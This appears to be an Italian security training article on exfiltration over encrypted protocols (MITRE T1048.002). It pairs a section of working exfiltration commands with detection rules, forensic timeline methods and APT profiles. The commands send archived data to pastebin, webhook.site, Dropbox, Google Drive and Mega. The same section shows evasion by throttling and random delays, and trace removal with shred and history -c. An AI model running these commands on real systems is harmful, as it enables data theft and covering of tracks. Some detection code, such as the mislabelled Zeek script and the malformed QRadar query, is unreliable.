Estrazione Dati Cifrati: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol (T1048.002)

L'esfiltrazione tramite protocolli cifrati asimmetrici rappresenta una tecnica sofisticata che sfrutta canali HTTPS/TLS legittimi per trasferire dati sensibili, aggirando i controlli di sicurezza tradizionali. A differenza delle comunicazioni command-and-control standard, questa tecnica utilizza infrastrutture apparentemente legittime come servizi cloud, pastebin o webhook.

Gli attaccanti implementano questa tecnica in fase di Exfiltration (TA0010) della kill chain, dopo aver già raccolto e preparato i dati target. La cifratura asimmetrica integrata nei protocolli standard rende il contenuto opaco all'ispezione, mentre l'uso di destinazioni legittime maschera il traffico malevolo.

L'impatto è significativo: 3 gruppi APT documentati utilizzano attivamente questa tecnica. APT28 ha esfiltrato archivi compressi via HTTPS da server OWA compromessi, mentre CURIUM ha utilizzato SMTPS per trasferire dati raccolti. Il gruppo Storm-1811 ha dimostrato l'uso di SCP per esfiltrare credenziali catturate.

Replicare questa tecnica in ambiente controllato richiede la comprensione di come sfruttare protocolli cifrati standard per nascondere trasferimenti di dati. L'obiettivo è dimostrare quanto sia difficile distinguere traffico legittimo da esfiltrazione malevola.

Preparazione dell'ambiente di test

Prima di iniziare, configura una VM isolata con accesso internet limitato. Installa strumenti come curl, openssl e rclone per simulare diversi scenari di esfiltrazione.

# Comprimi e cifra i dati target
tar czf - /path/to/sensitive/data | openssl enc -aes-256-cbc -salt -out data.enc -k MySecretKey

# Codifica in base64 per il trasferimento
base64 data.enc > data.b64

Esfiltrazione via HTTPS con curl

Il metodo più semplice utilizza POST HTTPS verso servizi che accettano upload anonimi:

# Upload verso servizio pastebin
curl -X POST https://pastebin.com/api/api_post.php \
  -d "api_dev_key=YOUR_KEY" \
  -d "api_paste_code=$(cat data.b64)" \
  -d "api_paste_private=1"

# Esfiltrazione verso webhook
curl -X POST https://webhook.site/unique-url \
  -H "Content-Type: application/json" \
  -d @data.b64

Utilizzo di Rclone per simulare backup cloud

Rclone è particolarmente efficace perché replica comportamenti di backup legittimi. Configura prima un remote storage:

# Configura Google Drive come destinazione
rclone config create exfil_drive drive scope drive.file

# Trasferisci con limitazione di banda per evitare detection
rclone copy data.enc exfil_drive:backups/ \
  --bwlimit 100k \
  --transfers 1 \
  --checkers 1

Esfiltrazione via canali alternativi

Per dimostrare la versatilità della tecnica, utilizza protocolli diversi da HTTPS:

# Via SFTP (richiede credenziali compromesse)
echo "put data.enc" | sftp -b - user@external-server.com

# Via SMTPS usando swaks
swaks --to receiver@external.com \
  --from sender@compromised.org \
  --server smtp.gmail.com:587 \
  --tls \
  --attach data.b64 \
  --auth-user compromised@gmail.com

Tecniche avanzate di offuscamento

Per evadere sistemi DLP e analisi comportamentale:

# Frammentazione del payload
split -b 1M data.b64 chunk_

# Upload con timing variabile
for chunk in chunk_*; do
  curl -X POST https://api.dropbox.com/2/files/upload \
    -H "Authorization: Bearer TOKEN" \
    -H "Dropbox-API-Arg: {\"path\": \"/$chunk\"}" \
    --data-binary @$chunk
  sleep $(shuf -i 30-300 -n 1)  # Delay randomico
done

Testing su diversi OS

Su Windows, PowerShell offre capacità native:

# Comprimi e invia via HTTPS
$data = Get-Content C:\sensitive\*.docx -Raw
$compressed = [IO.MemoryStream]::new()
$gzip = [IO.Compression.GzipStream]::new($compressed, [IO.Compression.CompressionLevel]::Optimal)
$gzip.Write([Text.Encoding]::UTF8.GetBytes($data), 0, $data.Length)
$gzip.Close()

Invoke-RestMethod -Uri "https://webhook.site/url" -Method Post -Body $compressed.ToArray()

Su macOS, sfrutta i tool nativi:

# Usa security framework per cifratura
security cms -e -r "recipient@example.com" -i sensitive.zip -o encrypted.p7

# Upload via curl con certificato client
curl --cert client.pem --key client.key \
  -X POST https://secure-endpoint.com/upload \
  -F "file=@encrypted.p7"

Validazione e cleanup

Dopo ogni test, verifica che i dati siano stati trasmessi correttamente e rimuovi le tracce:

# Verifica integrità post-trasferimento
curl https://pastebin.com/raw/PASTE_ID | base64 -d | \
  openssl enc -d -aes-256-cbc -k MySecretKey | tar tzf -

# Pulizia artefatti locali
shred -vfz data.enc data.b64 chunk_*
history -c

Questi esempi dimostrano quanto sia facile per un attaccante esfilitrare dati usando protocolli cifrati standard. La chiave è comprendere che il traffico HTTPS legittimo e quello malevolo sono indistinguibili a livello di rete, rendendo essenziale il monitoraggio comportamentale e contestuale.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo

Rilevare l'esfiltrazione su canali cifrati richiede un approccio multi-livello che combini analisi comportamentale, correlazione temporale e anomaly detection. La sfida principale è distinguere il traffico malevolo da quello legittimo senza generare un numero insostenibile di falsi positivi.

Implementazione della detection basata su volumi anomali

Il primo livello di detection monitora volumi di traffico inusuali verso destinazioni esterne. Configura threshold dinamici basati sulla baseline del tuo ambiente:

# Regola Splunk per volumi anomali HTTPS
index=network sourcetype=firewall action=allowed protocol=tcp dest_port=443
| bin _time span=5m
| stats sum(bytes_out) as total_bytes by src_ip, dest_ip, _time
| eventstats avg(total_bytes) as avg_bytes, stdev(total_bytes) as stdev_bytes by src_ip
| where total_bytes > (avg_bytes + (3 * stdev_bytes))
| where total_bytes > 10485760  # 10MB threshold
| alert

Per Elastic Stack, implementa una detection rule machine learning:

{
  "detector": {
    "name": "anomalous_https_upload",
    "description": "Detect unusual HTTPS upload volumes",
    "function": "high_sum(bytes_out)",
    "by_field_name": "source.ip",
    "partition_field_name": "destination.domain",
    "detector_index": 0
  },
  "influencers": ["source.ip", "destination.domain", "user.name"]
}

Correlazione tra accesso file e trasferimento di rete

L'approccio più efficace correla l'accesso a file sensibili con successive connessioni cifrate. Implementa questa logica in Sysmon con correlazione in SIEM:

<!-- Sysmon config per file access monitoring -->
<Sysmon>
  <EventFiltering>
    <FileCreate onmatch="include">
      <TargetFilename condition="contains any">
        .zip;.rar;.7z;.tar;.gz;.enc;.aes
      </TargetFilename>
    </FileCreate>
    <NetworkConnect onmatch="include">
      <DestinationPort>443,22,465,587,990</DestinationPort>
    </NetworkConnect>
  </EventFiltering>
</Sysmon>

Query di correlazione per QRadar:

SELECT 
  FileAccess.username,
  FileAccess.filename,
  Network.destinationip,
  Network.bytesout
FROM events
WHERE 
  EventID = '11' as FileAccess
  JOIN EventID = '3' as Network
  ON FileAccess.ProcessGuid = Network.ProcessGuid
  AND Network.EventTime BETWEEN FileAccess.EventTime AND FileAccess.EventTime + 300
  AND Network.BytesOut > 1048576

Detection di pattern temporali sospetti

Gli attaccanti spesso implementano delay per evadere detection. Monitora pattern di upload periodici:

# Script Python per Zeek detection
@load base/protocols/ssl
@load base/protocols/http

module ExfilDetection;

export {
    redef enum Notice::Type += {
        Periodic_HTTPS_Upload
    };
    
    global upload_tracking: table[addr] of vector of time;
}

event http_message_done(c: connection, is_orig: bool, stat: http_message_stat) {
    if (!is_orig && stat$method == "POST" && stat$response_body_len > 1048576) {
        local src = c$id$orig_h;
        
        if (src !in upload_tracking)
            upload_tracking[src] = vector();
        
        upload_tracking[src] += network_time();
        
        if (|upload_tracking[src]| >= 3) {
            local intervals: vector of interval;
            for (i in [1..|upload_tracking[src]|-1]) {
                intervals += upload_tracking[src][i] - upload_tracking[src][i-1];
            }
            
            # Check for periodic behavior
            if (variance(intervals) < 60.0) {
                NOTICE([$note=Periodic_HTTPS_Upload,
                        $src=src,
                        $msg=fmt("Periodic uploads detected: %s", intervals)]);
            }
        }
    }
}

Monitoring di certificati e domini sospetti

Implementa controlli sui certificati SSL/TLS per identificare destinazioni non autorizzate:

# Suricata rule per certificati sospetti
alert tls any any -> external any (
  msg:"Suspicious certificate CN detected";
  tls.cert_subject; content:"CN="; 
  pcre:"/CN=[0-9a-f]{8,}\.|(paste|temp|upload|free)/i";
  reference:url,attack.mitre.org/techniques/T1048/002;
  classtype:data-exfiltration;
  sid:1000001;
)

Dashboard operativo per il SOC

Crea una dashboard unificata che aggreghi tutti gli indicatori rilevanti:

# Elasticsearch query per dashboard
GET /network-*/_search
{
  "size": 0,
  "aggs": {
    "suspicious_uploads": {
      "terms": {
        "field": "source.ip",
        "size": 20
      },
      "aggs": {
        "destinations": {
          "terms": {
            "field": "destination.domain"
          }
        },
        "total_bytes": {
          "sum": {
            "field": "network.bytes_out"
          }
        },
        "unique_files": {
          "cardinality": {
            "field": "file.hash.sha256"
          }
        }
      }
    }
  }
}

Gestione dei falsi positivi

Per ridurre i falsi positivi, implementa whitelisting dinamico basato su comportamenti legittimi osservati:

# Configurazione per esclusioni automatiche
whitelist:
  domains:
    - "*.microsoft.com"
    - "*.google.com"
    - "*.amazonaws.com"
  processes:
    - "OneDrive.exe"
    - "GoogleDriveSync.exe"
    - "Dropbox.exe"
  volume_exceptions:
    - src_user: "backup_service"
      max_daily_gb: 100
    - src_subnet: "10.0.100.0/24"
      max_hourly_gb: 10

Risposta automatizzata agli alert

Implementa playbook di risposta che si attivino automaticamente:

def respond_to_exfiltration_alert(alert):
    # 1. Isolamento immediato
    if alert.confidence > 0.8:
        firewall.block_ip(alert.src_ip, duration=3600)
        
    # 2. Raccolta di evidenze
    evidence = collect_evidence(
        src_ip=alert.src_ip,
        timeframe=(alert.time - 3600, alert.time + 300),
        data_types=['process', 'network', 'file_access']
    )
    
    # 3. Notifica al team
    send_alert(
        severity='HIGH',
        title=f'Possibile esfiltrazione da {alert.src_ip}',
        evidence=evidence,
        recommended_actions=['Review user activity', 'Check file access logs']
    )

Questi controlli, combinati con una strategia di tuning continuo basata sull'ambiente specifico, permettono di rilevare efficacemente tentativi di esfiltrazione mantenendo sotto controllo i falsi positivi.

Vuoi diventare SOC Analyst ma non sai da dove iniziare?

Scarica la guida gratuita e scopri come si monitorano e bloccano gli attacchi informatici

Ricostruire una timeline accurata di esfiltrazione via canali cifrati richiede l'analisi correlata di molteplici artefatti. La chiave è identificare la sequenza di eventi che porta dalla raccolta dei dati alla loro trasmissione, anche quando il contenuto del traffico non è ispezionabile.

Identificazione degli artefatti di staging

Prima dell'esfiltrazione, gli attaccanti tipicamente comprimono e cifrano i dati. Su Windows, esamina:

# Analisi MFT per identificare file compressi creati di recente
$mftPath = "\\.\C:"
$mft = New-Object -ComObject Scripting.FileSystemObject
Get-WmiObject -Query "SELECT * FROM CIM_DataFile WHERE Extension = 'zip' OR Extension = '7z' OR Extension = 'rar'" |
    Where-Object {$_.CreationDate -gt (Get-Date).AddDays(-7)} |
    Select-Object Name, CreationDate, LastModified, Size

# Verifica Prefetch per tool di compressione
Get-ChildItem "C:\Windows\Prefetch" -Filter "7Z*.pf" | 
    ForEach-Object {
        $bytes = [System.IO.File]::ReadAllBytes($_.FullName)
        # Parsing del prefetch file per timestamp di esecuzione
    }

Su Linux, analizza i log di sistema e la history degli utenti:

# Timeline di comandi di compressione/cifratura
grep -E "(tar|zip|openssl|gpg|base64)" /var/log/auth.log /var/log/syslog |
    awk '{print $1" "$2" "$3" - "$0}' |
    sort -k1,3

# Analisi dettagliata con auditd
ausearch -k compression_tools --format csv | 
    csvcut -c event_time,exe,key | 
    csvsort -c event_time

Correlazione temporale tra accesso file e connessioni di rete

L'aspetto critico è collegare l'accesso ai file con le successive connessioni cifrate. Utilizza questo approccio:

import pandas as pd
from datetime import timedelta

# Carica eventi di file access e network
file_events = pd.read_csv('file_access_logs.csv')
network_events = pd.read_csv('network_connections.csv')

# Identifica pattern di esfiltrazione
def find_exfiltration_patterns(file_events, network_events, time_window=300):
    patterns = []
    
    for _, file_event in file_events.iterrows():
        # Cerca connessioni di rete entro time_window secondi
        mask = (
            (network_events['timestamp'] >= file_event['timestamp']) &
            (network_events['timestamp'] <= file_event['timestamp'] + timedelta(seconds=time_window)) &
            (network_events['process_id'] == file_event['process_id']) &
            (network_events['bytes_sent'] > 1048576)  # > 1MB
        )
        
        correlated = network_events[mask]
        if not correlated.empty:
            patterns.append({
                'file': file_event['filename'],
                'file_size': file_event['size'],
                'network_dest': correlated.iloc[0]['destination'],
                'bytes_sent': correlated.iloc[0]['bytes_sent'],
                'time_delta': (correlated.iloc[0]['timestamp'] - file_event['timestamp']).seconds
            })
    
    return pd.DataFrame(patterns)

Analisi dei certificati SSL/TLS

Anche se il contenuto è cifrato, i metadati dei certificati forniscono informazioni preziose:

# Estrai certificati da PCAP con tshark
tshark -r capture.pcap -Y "ssl.handshake.certificate" -T fields \
    -e frame.time -e ip.src -e ip.dst -e x509ce.dNSName -e x509sat.uTF8String |
    sort -k1 > ssl_certificates_timeline.txt

# Analisi con Zeek per maggior dettaglio
zeek -r capture.pcap -C protocols/ssl/validate-certs.zeek
cat ssl.log | zeek-cut ts id.orig_h id.resp_h server_name subject issuer validation_status

Ricostruzione della kill chain completa

Per macOS, utilizza il log unificato per una visione completa:

# Estrai eventi rilevanti con predicati temporali
log show --start "2024-01-10 08:00:00" --end "2024-01-10 18:00:00" \
    --predicate 'process == "curl" OR process == "rclone" OR eventMessage CONTAINS "SSL"' \
    --style json > timeline_raw.json

# Processa con jq per creare timeline
jq -r '.[] | select(.eventMessage != null) | 
    "\(.timestamp) | \(.processImagePath) | \(.eventMessage)"' timeline_raw.json |
    sort > timeline_processed.txt

Analisi forense della memoria

Per catturare evidenze di tool in esecuzione durante l'esfiltrazione:

# Volatility3 analysis
import volatility3
from volatility3.framework import contexts, automagic

# Analizza processi con connessioni di rete attive
def analyze_network_processes(memory_dump):
    context = contexts.Context()
    automagic.run_automagic(context, memory_dump)
    
    # Estrai informazioni sui socket
    from volatility3.plugins.windows import netscan
    scanner = netscan.NetScan(context, config={'primary': memory_dump})
    
    suspicious_connections = []
    for row in scanner.run():
        if row.State == "ESTABLISHED" and row.ForeignAddr not in trusted_ips:
            # Correla con processi
            proc_info = get_process_info(context, row.Owner)
            suspicious_connections.append({
                'process': proc_info['name'],
                'pid': row.Owner,
                'local': f"{row.LocalAddr}:{row.LocalPort}",
                'remote': f"{row.ForeignAddr}:{row.ForeignPort}",
                'created': row.CreateTime
            })
    
    return suspicious_connections

Creazione della timeline finale

Integra tutti gli artefatti in una timeline unificata:

class ExfiltrationTimeline:
    def __init__(self):
        self.events = []
    
    def add_event(self, timestamp, event_type, source, description, artifacts):
        self.events.append({
            'timestamp': timestamp,
            'type': event_type,
            'source': source,
            'description': description,
            'artifacts': artifacts
        })
    
    def generate_report(self):
        # Ordina eventi cronologicamente
        self.events.sort(key=lambda x: x['timestamp'])
        
        report = "EXFILTRATION TIMELINE ANALYSIS\n" + "="*50 + "\n\n"
        
        for event in self.events:
            report += f"[{event['timestamp']}] {event['type']}\n"
            report += f"Source: {event['source']}\n"
            report += f"Description: {event['description']}\n"
            report += f"Artifacts: {event['artifacts']}\n"
            report += "-"*30 + "\n"
        
        return report

# Esempio di utilizzo
timeline = ExfiltrationTimeline()
timeline.add_event(
    timestamp="2024-01-10 14:23:45",
    event_type="FILE_COMPRESSION",
    source="Prefetch/Process Monitor",
    description="7zip.exe executed to create archive.7z",
    artifacts={'prefetch': '7ZIP.EXE-A1B2C3D4.pf', 'target': 'C:\\Temp\\archive.7z'}
)

Validazione della timeline con hash analysis

Per confermare quale dato è stato esfiltrato:

# Genera hash dei file sospetti
find /path/to/investigation -type f -exec sha256sum {} + > local_hashes.txt

# Confronta con hash trovati in memoria/network
while read hash filename; do
    grep -q "$hash" memory_strings.txt && echo "MATCH: $filename was likely exfiltrated"
done < local_hashes.txt

Questa metodologia permette di ricostruire con precisione la sequenza di eventi anche quando il contenuto trasmesso non è recuperabile, fornendo evidenze solide per l'incident response e potenziali azioni legali.

Vuoi diventare Forensic Analyst ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto per analizzare incidenti e prove digitali

L'analisi dei gruppi APT che utilizzano esfiltrazione via canali cifrati rivela pattern comportamentali distintivi e preferenze infrastrutturali che permettono l'attribuzione e la predizione di future campagne.

Profilo dettagliato di APT28 (Fancy Bear)

APT28 dimostra una preferenza marcata per l'esfiltrazione attraverso infrastrutture legittime compromesse. La loro metodologia prevede:

Infrastruttura preferita: Server Exchange/OWA compromessi come staging point. APT28 tipicamente mantiene l'accesso per settimane, utilizzando web shell personalizzate per gestire l'archiviazione temporanea prima dell'esfiltrazione finale.

Pattern temporali: Le operazioni di esfiltrazione avvengono principalmente durante l'orario lavorativo del fuso orario target (mimetizzazione), con picchi il martedì e giovedì. I volumi trasferiti raramente superano i 500MB per sessione per evitare detection.

Evoluzione TTPs: Dal 2021, APT28 ha iniziato a utilizzare servizi cloud legittimi (OneDrive, Google Drive) compromettendo account aziendali esistenti invece di creare nuova infrastruttura.

# Pattern detection per APT28
apt28_indicators = {
    'network_patterns': [
        'compression seguita da upload HTTPS entro 10 minuti',
        'uso di User-Agent: Mozilla/5.0 (compatible; MSIE 9.0)',
        'certificati SSL auto-firmati con validity > 365 giorni'
    ],
    'behavioral_patterns': [
        'staging in %TEMP% con nomi file contenenti numeri casuali',
        'preferenza per archivi .7z con password',
        'cleanup dei file originali con cipher.exe /w'
    ]
}

Profilo di CURIUM e le loro innovazioni

CURIUM rappresenta l'evoluzione delle tecniche di esfiltrazione, con focus su:

Social engineering prolungato: A differenza di altri gruppi, CURIUM investe mesi nel costruire relazioni di fiducia prima dell'attacco. Questo si riflette nell'esfiltrazione: utilizzano canali di comunicazione già stabiliti (email, chat) per trasferire dati.

Preferenza per SMTPS: Il gruppo sfrutta server SMTP legittimi compromessi, inviando dati come allegati cifrati a caselle email sotto loro controllo. Pattern distintivo: utilizzo di subject line che imitano comunicazioni di routine aziendale.

Indicatori comportamentali:

Upload incrementali di piccole dimensioni (< 10MB)
Utilizzo di timestamp che coincidono con le pause pranzo locali
Rotazione di server SMTP ogni 3-4 giorni

Storm-1811: Il caso del ransomware con esfiltrazione

Storm-1811 combina ransomware con esfiltrazione pre-cifratura, un trend in crescita:

Doppia estorsione: Prima cifrano e esfiltrano, poi minacciano di pubblicare. L'esfiltrazione avviene via:

Mega.nz (70% dei casi)
AnonFiles (20% dei casi)
Infrastruttura proprietaria (10% dei casi)

Automazione: Utilizzano strumenti automatizzati per l'esfiltrazione:

# Tool pattern osservato
for dir in $(find / -name "*.docx" -o -name "*.xlsx" 2>/dev/null); do
    7z a -p$(openssl rand -base64 12) "/tmp/$(date +%s).7z" "$dir"
    megacmd put "/tmp/*.7z" /Uploads/$(hostname)/
    rm -f /tmp/*.7z
done

Previsione delle evoluzioni future

Basandosi sui trend osservati, prevediamo:

1. Shift verso protocolli IoT: I gruppi APT stanno sperimentando con MQTT e CoAP per esfiltrazione, sfruttando la minore visibilità di questi protocolli.

2. Abuso di CDN: Crescente uso di Cloudflare Workers e simili per creare proxy di esfiltrazione difficili da bloccare.

3. Steganografia in traffico legittimo: Integrazione di dati in stream video/audio legittimi (Teams, Zoom).

Intelligence actionable per la difesa

Indicatori predittivi da monitorare:

predictive_indicators:
  infrastructure:
    - Registrazione domini con pattern: [azienda]-[backup|storage|archive].[tld]
    - Certificati SSL con SAN contenenti sottodomini numerici
    - Spike di nuovi account su servizi cloud da IP geolocalizzati anomali
  
  behavioral:
    - Reconnaissance su share SMB contenenti keywords: "financial", "legal", "IP"
    - Query LDAP per gruppi contenenti "executive", "finance", "legal"
    - Accesso a repository Git/SVN seguito da compressione entro 1 ora
  
  temporal:
    - Attività di staging 2-3 giorni prima di festività nazionali
    - Pattern di esfiltrazione che evitano il lunedì (alto monitoring)
    - Preferenza per finestre 14:00-16:00 ora locale (cambio turno SOC)

Framework di threat hunting proattivo

Per anticipare questi gruppi, implementa:

class APTHuntingFramework:
    def __init__(self):
        self.threat_scores = {}
    
    def calculate_apt_probability(self, indicators):
        score = 0
        
        # APT28 patterns
        if indicators.get('exchange_compromise') and indicators.get('7z_usage'):
            score += 30
        
        # CURIUM patterns  
        if indicators.get('long_term_social_engineering') and indicators.get('smtp_abuse'):
            score += 25
            
        # Storm-1811 patterns
        if indicators.get('ransomware_precursors') and indicators.get('mega_nz_traffic'):
            score += 35
            
        # Behavioral analysis
        if self.analyze_temporal_patterns(indicators):
            score += 10
            
        return {
            'probability': score,
            'most_likely_group': self.attribute_group(indicators),
            'next_likely_action': self.predict_next_move(indicators)
        }

Condivisione intelligence con la community

Contribuisci al collective defense condividendo indicatori sanitizzati:

MISP: Crea eventi con tag "tlp:amber" per indicatori sensibili
YARA: Sviluppa regole per pattern di esfiltrazione specifici
STIX 2.1: Documenta campaign patterns per condivisione automatizzata

Questa analisi permette non solo di riconoscere attacchi in corso, ma di posizionare difese preventive basate sui pattern comportamentali osservati, trasformando la threat intelligence da reattiva a predittiva.